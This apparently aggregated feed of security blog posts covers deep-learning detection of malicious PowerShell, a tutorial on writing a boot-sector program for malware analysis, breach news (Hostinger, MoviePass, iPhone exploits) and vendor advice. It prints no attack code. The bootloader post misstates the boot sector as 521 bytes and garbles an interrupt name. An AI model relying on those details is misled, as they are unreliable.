The best performing deep learning model is applied at scale using Microsoft ML.Net technology and ONNX format for deep neural networks to the PowerShell scripts observed by Microsoft Defender ATP through the AMSI interface. This model augments the suite of ML models and heuristics used by Microsoft Defender ATP to protect against malicious usage of scripting languages.

Since its first deployment, this deep learning model detected with high precision many cases of malicious and red team PowerShell activities, some undiscovered by other methods. The signal obtained through PowerShell is combined with a wide range of ML models and signals of Microsoft Defender ATP to detect cyberattacks.

The following are examples of malicious PowerShell scripts that deep learning can confidently detect but can be challenging for other detection methods:

Figure 5. Heavily obfuscated malicious script

Figure 6. Obfuscated script that downloads and runs payload

Figure 7. Script that decrypts and executes malicious code

Enhancing Microsoft Defender ATP with deep learning

Deep learning methods significantly improve detection of threats. In this blog, we discussed a concrete application of deep learning to a particularly evasive class of threats: malicious PowerShell scripts. We have and will continue to develop deep learning-based protections across multiple capabilities in Microsoft Defender ATP.

Development and productization of deep learning systems for cyber defense require large volumes of data, computations, resources, and engineering effort. Microsoft Defender ATP combines data collected from millions of endpoints with Microsoft computational resources and algorithms to provide industry-leading protection against attacks.

Stronger detection of malicious PowerShell scripts and other threats on endpoints using deep learning mean richer and better-informed security through Microsoft Threat Protection, which provides comprehensive security for identities, endpoints, email and data, apps, and infrastructure.

 

Shay Kels and Amir Rubin
Microsoft Defender ATP team

 

Additional references:

The post Deep learning rises: New methods for detecting malicious PowerShell appeared first on Microsoft Security.

Writing Your First Bootloader for Better Analyses

From time to time we might observe special Malware storing themselves into a MBR and run during the booting process. Attackers could use this neat technique to infect and to mess-up your disk and eventually asking for a ransom before restoring original disk-configurations (Petya was just one of the most infamous boot-ransomware). But this is only an already known scenario while humongous possibilities are still available for the attacker who holds physical rights to open your disk and to write in it whatever he desires. For this reason I believe it would be interesting to understand how MBR works and how is it possible to write a boot loader program, this skill will help you during the analysis of your next Boot Loader Malware.

How the PC boot process works ?

Actually the boot process is super easy. When you press the power button you are providing the right power to every electronic chips who needs it. The BIOS once is reached by electrical power starts by running its own stored code and when it finishes running its initialization routines it looks for bootable devices. A bootable device is a physically connected device who has 521 bytes of code at its beginning and that contains the boot magic number: 0x55AA as last 2 bytes. If the BIOS find 510 bytes followed by 0x55AA it takes the previous 510 bytes moves them into RAM (to 0x7c00 address) and assumes they are executable bytes. This code is the so-called bootloader. Just a side note: bootloader shall be written in 16bit since x86 compatible CPUs are working in “real_mode” due the limited available instruction set.

Used tools

I am used to write and read assembly on “Intel sintax” (it’s the one I learned during my studies) but today I’d love to use GNU Assembler (compiler&linker) who implements AT&T syntax, which is quite different from the Intel one but it will just work fine for the simple code we are going to write. The first tool we are going to use is as, the GNU compiler, which takes as input an assembly file and it returns its binary representation. as -o boot.o boot.asm is what we are looking for. After the compiler we need a “linker” (GNU linker is called ld). We need to tell to the liner that we want a plain binary file without linked libraries or linked symbols, fir such a reason we’re going to use --oformat binar. We also need to tell to the “linker” where the code starts (-e main). We would add the parameter -Ttext 0x7c00 just in case the code we are going to write does not fit into a 16bit address space, so we will force our linker to map the main function at such address which we know be the address where the BIOS runs bootloaders. Assuming our code named boot.asm and our original entry point to be labelled as ‘main’ we could use the following command: ld -o boot.bin --oformat binary -e main -Ttext 0x7c00 boot.o. For running the compiled code I’ve just used qemu in the following simple way: qemu-system-x86_64 boot.bin

The Code

The following code runs on boot showing up 3 strings and a realtime clock progression. The code have been developed as demo, not caring about performance and optimization, I am sure the code could be optimized and beautified, but this is not my point for this post.

Since the BIOS is in near memory, we are able to use a whole BIOS instruction set as described in here. The used interrupts for the demo bootloader are the following:
1. Int_10,02 for setting up screen size
2. int_10,07 for cleaning the screen from BIOS outputs
3. int_12a,02 for setting cursor positions
4. int_1a,02 for reading the clock status
5.int_10,0e for writing character to screen

Following the “booting source” code is getting explained

Even if the code is slef-described let’s dig a little bit into the structure. The first two lines:
1] .code16
2] .global main
say that the code is going to be written in 16bit mode and the external (exposed) tagged function is the one labelled as ‘main’ (the linker needs it in order to setup the original entry point in proper address space).
The last two lines:
112] .fill 510-(.-init), 1, 0
113] .word 0xaa55
say the code is bootalbe. In line 113 we have little-endian magic code while in line 112 we have the filling command, interpreted by the compiler, to fill-up (nop) the eventually empty bytes (up to 521 bytes) for getting safe the MBR structure.

The entire code exploits %cx register to setup the current state. For example %cx could be: 0x0000if msg is printed, 0x0001 if msg2 is printed, 0x0002 if msg3 is printed and 0x0003 if we want to start the clock printing loop. A very nice primitive command lodsb is used to iterate over string characters (for more details here) in order to print them to monitor until null byte (\0).

Running the boot image

References

  1. David Jurgens: Help PC Reference Library
  2. AshakiranBhatter: Writing BootLoader


The Information Technology industry’s major cybersecurity challenges

Estimated reading time: 3 minutes

The Information Technology (IT) sector has snowballed into an extremely profitable and revenue-generating entity in a relatively small amount of time. IT is single-handedly responsible to initiate and implement digitalization ensuring that a very large amount of information gets converted from a manual to a digital format. The industry’s involvement, especially in the avenues of processing data has automatically made it a sought-after target for cyber attackers.

Typically, cybercriminals like to target industries where the repercussion of a cyberattack will be immense and the stolen data will be valuable. By targeting the IT sector, they naturally suffice their purpose of attacking large industries with a huge workforce – something that can impact an entire nation’s economy.

The growing threat is confirmed by the numbers itself – according to Seqrite’s Quarterly Threat Report from the second quarter of 2019, IT/ITES companies were the fourth largest target for cyberattacks at 6.15% of the total malware attacks for that quarter.

But this risk can be significantly averted if the IT sector empowers itself to tackle this growing threat. The first step is assessment and hence, the IT sector must ensure it is in the position to deal with some of the biggest cybersecurity threats that plague this sector.

  1. Skills gap

According to a recent workforce assessment survey, 59% of organizations had vacant cybersecurity positions – Frost & Sullivan forecasts a shortfall of 1.5 million by 2020 globally. This statistic sharply illustrates a major problem the IT sector is facing when it comes to cybersecurity; the daunting and ever-increasing skills gap.

Skilled cybersecurity personnel are in huge demand but the supply doesn’t seem to keep up. That is why organizations in the IT sector must keep exploring ways to overcome the skills gap by investing in regular training and upskilling programs.

  1. MaaS as an Advanced Persistent Threat

As per the analysis of Seqrite’s annual threat reports, it is predicted that the evolution of RaaS (Ransomware as a Service) which is a form of MaaS (Malware as a Service) is pointing towards the future possibility of an ‘As a Service model’ for Advanced Persistent Threats (APTs).

What this would hypothetically mean is that malware authors could quite likely pivot to searching for generic loopholes in high-profile sectors like IT/ITES. These could then be sold as a well-organized attack vector to those willing to pay. Governments or anti-state actors could take use of APT as a service to get information or infiltrate different departments of IT companies.

  1. Data breach

Remember the huge Equifax data breach in 2017? Apart from major reputational and operational damage, it was also responsible for major financial setbacks.

Recent reports suggest that the American organization will have to pay about $700 million as part of a global settlement over the data breach. Recent, Indian IT company Wipro also admitted that they had suffered a high-profile data breach.

Companies in the information technology sector must take cognizance of this growing threat as the amount of valuable data they possess makes them very vulnerable to this threat.

  1. Insider Threats

The IT sector witnesses a constant flux of employees – an endless cycle of attrition and hiring. Employees, current and previous, are instrumental in many instances of accidental or purposeful data leaks. This phenomenon is commonly known as insider threats.

Insider threats pose a major problem for the IT sector, thanks to the number of people with access to confidential data. Employees may switch between different projects for different clients which means they have access to confidential client information.

If this information gets leaked either advertently or inadvertently, it could pose a huge problem for their respective companies.

Keeping all these threats in mind, it is imperative that the IT sector embraces the challenge and keeps upgrading its cybersecurity solutions. They can consider investing in solutions like Seqrite’s Endpoint Security (EPS), a simple and comprehensive platform to protect enterprise networks from advanced threats, and Unified Threat Management (UTM), a one-stop solution for all enterprise security needs.

The post The Information Technology industry’s major cybersecurity challenges appeared first on Seqrite Blog.

Why Is a Data Classification Policy Absolutely Important?

Today, data is a valuable commodity. Without it, company executives cannot make well-informed decisions, marketers won’t understand their market’s behavior, and people will have a hard time finding each other over social media platforms. But not all data are equal, which is why companies must have a data classification policy in place to safeguard the important and sensitive data.

What Is a Data Classification Policy?

Data classification policy is an organizational framework aimed at guiding employees on how to treat data. During the creation of a data classification policy, categories for data are created to help the company distinguish which data are considered confidential and which are considered public.

A data classification policy applies to all kinds of data acquired by the company. Both digital and written data must be inspected with equal importance and classified appropriately according to the data classification policy.

Data Classification Policy and Cyber Security

When it comes to cybersecurity and risk management against unexpected data breaches, data classification policies play an important role.

Data classification policies help rank-and-file employees, as well as C-level management, identify which set of data must be treated with utmost care. A well-crafted data classification policy would view corporate decisions as strictly confidential, and such highly-sensitive information must be secured with the highest possible form of encryption.

Data policies also shed light on what data are considered public, personal, confidential, and sensitive. Each classification is given a different level of security under the policy, and each data set is given to key personnel for compilation, collection, and storage.

Because of the nature of the policy, data classification plays a supporting role in a company’s cybersecurity program, making it harder for corporate spies to retrieve valuable company data. The data classification policy must also provide details on where the data should be stored and who has authority to retrieve them.

Data Classification Services

Information security firms know how risky data theft is for companies, especially for Fortune 500 companies that have a large volume of sensitive data. That’s why many information security companies offer data classification services to help companies reduce their overall vulnerability.

Data security experts provide data classification services that include tools, training, and collaboration with clients in the creation of a data classification program. Many data classification services build the data classification policy from the ground up and help with the implementation of the policy. They also conduct security checks to help ensure that the level of security does not fall.

Conclusion

With companies receiving a large volume of data every day, it’s difficult for company employees and managers to stop and think about how a piece of data must be classified and handled. Without a clear and well-structured policy in place, employees are left to decide how data are stored and managed.

If you believe in the importance of data security, then having a well-structured data classification policy and availing data classification services from data security experts will give your company the data protection it needs to prevent heavy damages in case of a data breach.

Also Read,

Defining Data Classification

Common Sense Ways Of Handling Data, Digital Or Not

Key Factors for Data – Centric Data Protection

The post Why Is a Data Classification Policy Absolutely Important? appeared first on .

Google Discovers Massive iPhone Hack

Researchers at Google announced the discovery of a hacking campaign that used hacked websites to deliver malware to iPhones.

Project Zero, Google’s security research team, discovered fourteen previously unknown vulnerabilities, called zero day exploits, that were capable of compromising iPhones. Further research revealed a small collection of hacked websites capable of delivering malware to iPhone users visiting those sites.

“There was no target discrimination; simply visiting the hacked site was enough for the exploited server to attack your device, and if it was successful, installing a monitoring implant. We estimate that these sites receive thousands of visitors per week,” wrote Project Zero member Ian Beer in a blog post announcing their findings.

The data accessible on the compromised phones included the user’s location, their passwords, chat histories, contact lists, and full access to their Gmail accounts. 

“Given the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services… even after they lose access to the device,” said Beer.

The hacking campaign was active for at least two years before it was discovered by Project Zero. The research team informed Apple of their findings, and the targeted vulnerabilities were patched in an update in February 2019. 

The post Google Discovers Massive iPhone Hack appeared first on Adam Levin.

7 Questions to Ask Your Child’s School About Cybersecurity Protocols

Just a few weeks into the new school year and, already, reports of malicious cyberattacks in schools have hit the headlines. While you’ve made digital security strides in your home, what concerns if any should you have about your child’s data being compromised at school?

There’s a long and short answer to that question. The short answer is don’t lose sleep (it’s out of your control) but get clarity and peace of mind by asking your school officials the right questions. 

The long answer is that cybercriminals have schools in their digital crosshairs. According to a recent report in The Hill, school districts are becoming top targets of malicious attacks, and government entities are scrambling to fight back. These attacks are costing school districts (taxpayers) serious dollars and costing kids (and parents) their privacy.


Prime Targets

According to one report, a U.S. school district becomes the victim of cyberattack as often as every three days. The reason for this is that cybercriminals want clean data to exploit for dozens of nefarious purposes. The best place to harvest pure data is schools where social security numbers are usually unblemished and go unchecked for years. At the same time, student data can be collected and sold on the dark web. Data at risk include vaccination records, birthdates, addresses, phone numbers, and contacts used for identity theft. 

Top three cyberthreats

The top three threats against schools are data breaches, phishing scams, and ransomware. Data breaches can happen through phishing scams and malware attacks that could include malicious email links or fake accounts posing as acquaintances. In a ransomware attack, a hacker locks down a school’s digital network and holds data for a ransom. 

Over the past month, hackers have hit K-12 schools in New Jersey, New York, Wisconsin, Virginia, Oklahoma, Connecticut, and Louisiana. Universities are also targeted.

In the schools impacted, criminals were able to find loopholes in their security protocols. A loophole can be an unprotected device, a printer, or a malicious email link opened by a new employee. It can even be a calculated scam like the Virginia school duped into paying a fraudulent vendor $600,000 for a football field. The cybercrime scenarios are endless. 

7 key questions to ask

  1. Does the school have a data security and privacy policy in place as well as cyberattack response plan?
  2. Does the school have a system to educate staff, parents, and students about potential risks and safety protocols? 
  3. Does the school have a data protection officer on staff responsible for implementing security and privacy policies?
  4. Does the school have reputable third-party vendors to ensure the proper technology is in place to secure staff and student data?
  5. Are data security and student privacy a fundamental part of onboarding new school employees?
  6. Does the school create backups of valuable information and store them separately from the central server to protect against ransomware attacks?
  7. Does the school have any new technology initiatives planned? If so, how will it address student data protection?

The majority of schools are far from negligent. Leaders know the risks, and many have put recognized cybersecurity frameworks in place. Also, schools have the pressing challenge of 1) providing a technology-driven education to students while at the same time, 2) protecting student/staff privacy and 3) finding funds to address the escalating risk.

Families can add a layer of protection to a child’s data while at school by making sure devices are protected in a Bring Your Own Device (BYOD) setting. Cybersecurity is a shared responsibility. While schools work hard to implement safeguards, be sure you are taking responsibility in your digital life and equipping your kids to do the same. 

 

The post 7 Questions to Ask Your Child’s School About Cybersecurity Protocols appeared first on McAfee Blogs.

14 Million Customers Affected By Hostinger Breach: How to Secure Your Data

Whether you’re a small business owner or a blogger, having an accessible website is a must. That’s why many users look to web hosting companies so they can store the files necessary for their websites to function properly. One such company is Hostinger. This popular web, cloud, and virtual private server hosting provider and domain registrar boasts over 29 million users. But according to TechCrunch, the company recently disclosed that it detected unauthorized access to a database containing information on 14 million customers.

Let’s dive into the details of this breach. Hostinger received an alert on Friday that a server had been accessed by an unauthorized third party. The server contained an authorization token allowing the alleged hacker to obtain further access and escalate privileges to the company’s systems, including an API (application programming interface) database. An API database defines the rules for interacting with a particular web server for a specific use. In this case, the API server that was breached was used to query the details about clients and their accounts. The database included non-financial information including customer usernames, email addresses, hashed passwords, first names, and IP addresses.

Since the breach, Hostinger stated that it has identified the origin of the unauthorized access and the vulnerable system has since been secured. As a precaution, the company reset all user passwords and is in contact with respective authorities to further investigate the situation.

Although no financial data was exposed in this breach, it’s possible that cybercriminals can use the data from the exposed server to carry out several other malicious schemes. To protect your data from these cyberattacks, check out the following tips:

  • Be vigilant about checking your accounts. If you suspect that your data has been compromised, frequently check your accounts for unusual activity. This will help you stop fraudulent activity in its tracks.
  • Reset your password. Even if your password wasn’t automatically reset by Hostinger, update your credentials as a precautionary measure.
  • Practice good password hygiene. A cybercriminal can crack hashed passwords, such as the ones exposed in this breach, and use the information to access other accounts using the same password. To avoid this, make sure to create a strong, unique password for each of your online accounts.

And, as always, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 14 Million Customers Affected By Hostinger Breach: How to Secure Your Data appeared first on McAfee Blogs.

The retail industry’s major cybersecurity challenges

Estimated reading time: 3 minutes

The retail sector has always been at the risk of cyberattacks. The industry has already seen high-profile data breaches, some of which have happened in the recent past at large retail brands, lucrative to cyberattackers, such as Target, TJX and Home Depot.

One of the major reasons for these attacks is the fact that the number of vectors is huge. This industry sees a large volume of cards, cash, POS and online transactions on a regular basis making retail a sought after target for cyberattackers.

Especially nowadays, the retail sector is increasingly moving towards digital and while this will bring a plethora of opportunities, the risks of cyberattacks also automatically become immense. The numbers for various surveys have said it aloud – a 2018 report found that 50% of retailers have been breached in the past year. The monetary consequences for retailers can also be major – according to a KPMG study, 19% of customers said they would completely stop shopping at a retailer over a hack while 33% said they would not shop at the same retailer for more than three months.

These are increasingly troubling statistics and hence, it is important that retailers fix various cybersecurity issues such as:

  1. POS Security Vulnerabilities

One of the reasons why POS systems have a high-security risk is due to the soaring stakes involved. These systems collect data for hundreds of transactions every single day, making it a veritable gold mine for hackers. These systems are also more vulnerable to malware because of the very nature for what they are used for.

As a tool which is used extremely regularly, network administrators do not get the time to ensure that the correct updates and patches are run on the system, making it vulnerable to new and advanced threats.

  1. Malware-as-a-service

Of late, malware, especially ransomware – is readily available for download from the dark web. Even amateurs, armed only with criminal intent can access vulnerable retail channels and launch an attack. This naturally raises the sheer number of possible attackers, and that increases the need for retailers to bolster sensitive points in their network. Network security along with endpoint security is extremely vital for retailers and products such as Seqrite’s UTM are proven to safeguard retail enterprise networks.

  1. Human factors

An enormous amount of cyber risks arise from human factors. In the retail industry, these human factors may not always be controllable, as it employs a large number of low-skilled workforce with high attrition rates, along with a considerable amount of third party interfacing through the supply chain.

  1. Increasing integration with Internet of Things

The Internet of Things (IoT), which essentially connects devices like refrigerators, TVs, other home appliances and even cars to the web, is seeing a heavy adoption. Its potential in the retail industry is immense with companies trying to integrate in-store cameras, sensors etc. with the shoppers’ smartphones.

With multiple devices connecting to an organization’s network, the risk of having unguarded entry points to the system increases. Some of the cyber experts refer to this phenomenon as the ‘Internet of Vulnerabilities’ and if appropriate measures to shield from attacks are not undertaken, the retail industry is nothing more than a fertile hunting ground for cyberattackers.

  1. Security on mobile devices

Mobile phones are ubiquitous and are becoming one of the top tools for shopping. As per a Deloitte report, the younger generation especially 25-34-year-olds are heavily inclined to use mobile devices for browsing, shopping and purchasing.

With a rise in usage of the same by employees within office, a company’s network is suddenly under a deluge of connections some of which might be host to dangerous malware.

This in turn suddenly puts, not only the network under threat but also all the connected devices.

The retail industry is in a vulnerable state and is a target for attacks by organized cybercriminals as well as opportunistic hackers. It is the retail industry’s onus to protect its own operations as well as the critical information of their customers.

It is essential that retailers make use of well-established security practices, frameworks, and solutions like Seqrite to safeguard their customers’ data and their business operations.

The post The retail industry’s major cybersecurity challenges appeared first on Seqrite Blog.

University, Professional Certification or Direct Experience ?

Today I’d like to share a simple and personal thought about teaching models on cybersecurity. Quite often students ask me how to improve their technical skills and the most common question is: “would it be better an university course a professional certification or getting directly on the field working in a Cybersecurity company ?”. The answer is not trivial at all since it really depends on the student maturity and on what he desires to be in few years from now (is. a researcher, a professional penetration tester, a reverse engineer, a CISO, etc.) but that recursive question raised a more general question: what are the differences between cybersecurity educational models?

Photo by Sharon McCutcheon on Unsplash

The education process is based upon the information to be shared, by meaning that information is the “starting brick” of education. If there is no information to be shared there isn’t an education process. Off course information alone it’s not enough for education, everybody knew the difference between a good teacher and an ordinary one, but every teacher starts from a concept do be explained, that concept I would call (in this post) information. If there is someone who teaches there is at least another one who learn and by learning he will increase his knowledge on the topic. So the knowledge is the focus and understanding what knowledge means could definitely help us to improve our teaching processes. But we have many teaching processes, for example we have Universities teaching process which is mainly based on scientific evidences, Certifications teaching process which is mainly focused on procedures and tool sets, Camp teaching process which is mainly focused on relational approach (a.k.a knowing the right person for the specific problem), Technical Laboratory which is mainly focused on personal experiences, and so on and so forth. Every process differs from each other so what teaching process would be more effective to increase the cybersecurity knowledge ?

According to Paul Boghossian (Fear of Knowledge, Against Relativism and Constructivism), Luciano Floridi ( The Fourth Information Revolution and its Ethical and Policy Implications) and the internet Encyclopedia of Philosophy we might divide knowledge into 4 separate categories.
Section 1: The certainty. The information that I had. What I am sure it’s true.
Section 2: The foolishness. The information that I know I’m missing.
Section 3: The uncertainty. The information that I have but that I am not sure to be true.
Section 4: The ignorance. The information that I don’t known I don’t have yet.

Let me try to clarify those categories with an example by assuming Alice as our company CIO . Alice knows exactly what cybersecurity defence systems has implemented and she knows eventually her network will be hit by the next cybersecurity attack. This is what we call certainty. In other words this information is what Alice knows and believes it’s true. However she doesn’t know when the cyber attack will happen, what infrastructures the attacker will hit and what technique the attacker will use (phishing, exploiting, scam, etc). This is her foolishness. In other words she knows that she doesn’t know some information for example who will be the victim. Moreover Alice is definitely not sure 100% the countermeasures she adopted will be enough strong to defeat the upcoming cyber attack. This is her uncertainty. Again she has no idea if her shields would resist against the attack is going to happen. Finally Alice doesn’t know that the attacker unfortunately has already powned the company domain controller. This is what we have defined as ignorance. In other words all the information that Alice is not aware of.

What a good teaching process should do is to increase Section 1 by giving certainties and to drastically reduce Section 2, Section 3 and Section 4. In my personal point of view the academic teaching process (university) is perfect to increase Section 1 and to drastically reduce Section 3. This sounds plausible since increasing the certainty by reducing the uncertainty is an evidence-based-process which is build upon tests and researches: a typical university oriented approach. Section 2 should be addressed by professional certifications. Professional certifications would definitely fill foolishness by getting more tactics and techniques to be implemented in the real world. And finally Section 4 is filled by experience. Direct teaching process would help in providing stereotypes, but the reality is always different from stereotypes, it’s our experience that associate the reality to the closed stereotype in order to find the best solution. In other words it’s hard to know what is not known and the experience is a main road to fight ignorance.

We probably could end-up with an obvious answer to the original question, but I really don’t think there is a preferred path to increase your technical skill, it’s a never ending learning process where every step takes its own time.

Ellen DeGeneres Instagram Hack: What You Can Do to Protect Your Account

Today was not an easy morning for Ellen DeGeneres. She woke to find that her Instagram account was briefly hacked according to the talk show host’s Twitter and Yahoo Entertainment. A series of giveaways offering free Tesla cars, MacBooks, and more, were posted to the talk show host’s account last night. After seeing the posts, some of her followers became skeptical and warned her of the suspicious behavior. They were smart to flag the giveaways as untrustworthy because DeGeneres confirmed that her Instagram was in fact affected by malicious activity.

While Ellen joked about “password” not being the most secure password, it’s always a best practice to use strong passwords that differ from each of your other accounts to avoid easy break-ins from cybercriminals.

One of the central reasons hackers target social media accounts is to retrieve stored personal information. Once cybercriminals log into an account, they have access to everything that has ever been shared with the platform, such as date of birth, email, hometown, and answers to security questions. They then could potentially use this information to try to log into other accounts or even steal the person’s identity, depending on the level of information they have access to.

Another motive for hijacking a user’s social media account is to spread phishing scams or malware amongst the user’s network. In DeGeneres’ case, her 76 million Instagram followers were prompted to click on links that were scams disguised as giveaways so hackers could steal their personal information. In other cases, hackers will use adware so they can profit off of clicks and gain access to even more valuable information from you and your contacts. Sometimes these cybercriminals will post publicly on your behalf to reach your entire network, and other times they will read through private messages and communicate with your close network directly.

It’s not just celebrities that are vulnerable to cybercriminals. In fact, over 22% of internet users reported that their online accounts have been hacked at least once, and more than 14% said that they were hacked more than once. If your account gets hacked, the first step is to change your password right away and notify your network, so they don’t click on any specious links.

The good news is that by taking proper precautions, you can significantly reduce risk to help keep your account safe. Here are five best practices for protecting your social media accounts from malicious activity:

  • Use your best judgment and don’t click on suspicious messages or links, even if they appear to be posted by a friend.
  • Flag any scam posts or messages you encounter on social media to the platform, so they can help stop the threat from spreading.
  • Use unique, complicated passwords for all your accounts.
  • Avoid posting any identifying information or personal details that might allow a hacker to guess your security questions.
  • Always use comprehensive security software that can keep you protected from the latest threats.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Ellen DeGeneres Instagram Hack: What You Can Do to Protect Your Account appeared first on McAfee Blogs.

Lights, Camera, Cybersecurity: What You Need to Know About the MoviePass Breach

If you’re a frequent moviegoer, there’s a chance you may have used or are still using movie ticket subscription service and mobile app MoviePass. The service is designed to let film fanatics attend a variety of movies for a convenient price, however, it has now made data convenient for cybercriminals to potentially get ahold of. According to TechCrunch, the exposed database contained 161 million records, with many of those records including sensitive user information.

So, what exactly do these records include? The exposed user data includes 58,000 personal credit cards and customer card numbers, which are similar to normal debit cards. They are issued by Mastercard and store a cash balance that users can use to pay so they can watch a catalog of movies. In addition to the MoviePass customer cards and financial information numbers, other exposed data includes billing addresses, names, and email addresses. TechCrunch reported that a combination of this data could very well be enough information to make fraudulent purchases.

The database also contained what researchers presumed to be hundreds of incorrectly typed passwords with user email addresses. With this data, TechCrunch attempted to log into the database using a fake email and password combination. Not only did they immediately gain access to the MoviePass account, but they found that the fake login credentials were then added to the database.

Since then, TechCrunch reached out to MoviePass and the company has since taken the database offline. However, with this personal and financial information publicly accessible for quite some time, users must do everything in their power to safeguard their data. Here are some tips to help keep your sensitive information secure:

  • Review your accounts. Be sure to look over your credit card and banking statements and report any suspicious activity as soon as possible.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, as always, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Lights, Camera, Cybersecurity: What You Need to Know About the MoviePass Breach appeared first on McAfee Blogs.

Gartner names Microsoft a Leader in 2019 Endpoint Protection Platforms Magic Quadrant

Our mission as a company is to empower every person on the planet to achieve more. We deliver on that mission through products that achieve the highest marks in the industry, which we believe is inclusive of Gartner’s Magic Quadrant. We have been on a journey for the last several years working hard to offer our customers leading endpoint protection so they can defend against increasingly sophisticated attacks across a variety of devices, which is why we are so proud to have placed in the Leaders quadrant for this year’s 2019 Gartner EPP Magic Quadrant and positioned highest in execution!

According to Gartner, “Leaders demonstrate balanced and consistent progress and effort in all execution and vision categories. They have broad capabilities in advanced malware protection, and proven management capabilities for large enterprise accounts.” Our latest product offerings prove that we’ve risen to the challenge that today’s threat landscape presents. This achievement represents our ability to provide best-in-class protection and deliver on innovations that learn and evolve just as attackers change their tactics.

Gartner Endpoint Protection Platforms Magic Quadrant

According to Gartner, “An endpoint protection platform (EPP) is a solution deployed on endpoint devices to prevent file-based malware, malicious scripts and memory-based threats. It is also deployed to detect and block malicious activity from trusted and untrusted applications, and to provide the investigation and remediation capabilities needed to dynamically respond to security incidents and alerts”.

Over the last years we continuously evolved our endpoint security platform, Microsoft Defender Advanced Threat Protection (ATP), by further enhancing existing features and by adding new and innovative capabilities, including:

  • Multi-layered protection: Microsoft Defender ATP provides multi-layered protection (built into the endpoint and cloud-powered) from file-based malware, malicious scripts, memory-based attacks, and other advanced threats
  • Threat Analytics: Contextual threat reports provide SecOps with near real-time visibility on how threats impact their organizations
  • A new approach to Threat and Vulnerability Management: Real-time discovery, prioritization based-on business context and dynamic threat landscape, and built-in remediation process speed up mitigation of vulnerabilities and misconfiguration
  • Built-in, cloud-powered protections: Real-time threat detection and protection with built-in advanced capabilities protect against broad-scale and targeted attacks like phishing and malware campaigns
  • Behavioral detections: Endpoint detection and response (EDR) sensor built into Windows 10 for deeper insights of kernel and memory, and leveraging broad reputation data for files, IPs, URLs, etc., derived from the rich portfolio of Microsoft security services
  • “Deployment” is as easy as it gets by being built directly into the operating system. There is no agent to deploy, no delays or compatibility issues, and no additional performance overhead or conflicts with other products. No deployment and no on-premises infrastructure directly leads to lower TCO.
  • Contain the threat: Dramatically reduces the risk by strengthening your defenses when potential threats are detected. Microsoft Defender ATP can automatically apply Conditional access to restrict the endpoint from accessing corporate data until the threat was remediated.
  • Automated security: From alerts to remediation in minutes – at scale. Microsoft Defender ATP leverages AI to automatically investigate alerts, determine if a threat is active, what course of action to take, and then remediate complex threats in minutes.
  • Secure Score: Watch your security score rise in the Microsoft Defender Security Center as you implement automated and recommended actions to protect both users and data. Microsoft Defender ATP not only tells you that you have a problem, but Microsoft Defender ATP also recommends how to solve it (and track the execution) with Secure Score. Vulnerability and configuration information provide weighted recommendations and actions to improve endpoint hardening and compare the current posture with the industry and global peers for benchmarking.
  • Microsoft Threat Experts: Microsoft has your back — with Microsoft’s managed detection and response (MDR) service (called Microsoft Threat Experts), Microsoft supports customers’ incident response and alert analysis. Our automated threat hunting service helps ensure that potential threats don’t go unnoticed.

Download this complimentary full report and read the analysis behind Microsoft’s positioning as a “Leader”. As we continue on this journey and add even more capabilities to protect, detect and respond to this evolving threat landscape, we welcome our customer’s feedback and partnership so we can continue to deliver best-in-class protection.

For more information about our endpoint protection platform, or to sign up for a trial visit our Microsoft Defender Advanced Threat Protection (ATP) page.

 

Gartner Magic Quadrant for Endpoint Protection Platforms, Peter Firstbrook, Dionisio Zumerle, Prateek Bhajanka, Lawrence Pingree, Paul Webber, 20 August 2019.

Gartner Competitive Landscape: Endpoint Protection Platforms, Worldwide, 2019, Lawrence Pingree, 20 May 2019.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from http://www.gartner.com/reprints/?id=1-1OCBC1P5&ct=190731&st=sb.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post Gartner names Microsoft a Leader in 2019 Endpoint Protection Platforms Magic Quadrant appeared first on Microsoft Security.

The transformation of enterprise security from 2017 to 2019

Estimated reading time: 2 minutes

The nature of enterprise security is such that it continuously keeps evolving. Trends change, threats vary and morph into different entities, approaches that seem relevant get outdated in six months or sometimes even lesser. For enterprises looking to stay ahead of the curve when it comes to cybersecurity, staying stagnant is not an option. The need of the hour is to keep abreast of the latest new trends and technologies to stay safe.

Thanks to the speed of transformation, enterprise security has seen multifold changes in the last two years, some due to need and some due to necessity. These changes can be summed up through the following pointers:

A move towards a zero-trust network

More and more organizations are moving towards a zero-trust model where no one and nothing is trusted. Introduced by American market research giant, Forrester Research, the zero-trust network model eliminates the concept of a perimeter and calls for enterprises to inspect all network traffic without any classification of ‘internal’ and ‘external.’. Basically, no user or traffic is considered ‘authorized’ and all access to a specific network is governed by the same set of rules.

The evolution from 4G to 5G

In 2017, enterprise security needed to understand 4G – now, network technology has evolved to such an extent that the world is embracing 5G. It is a trend which enterprises must als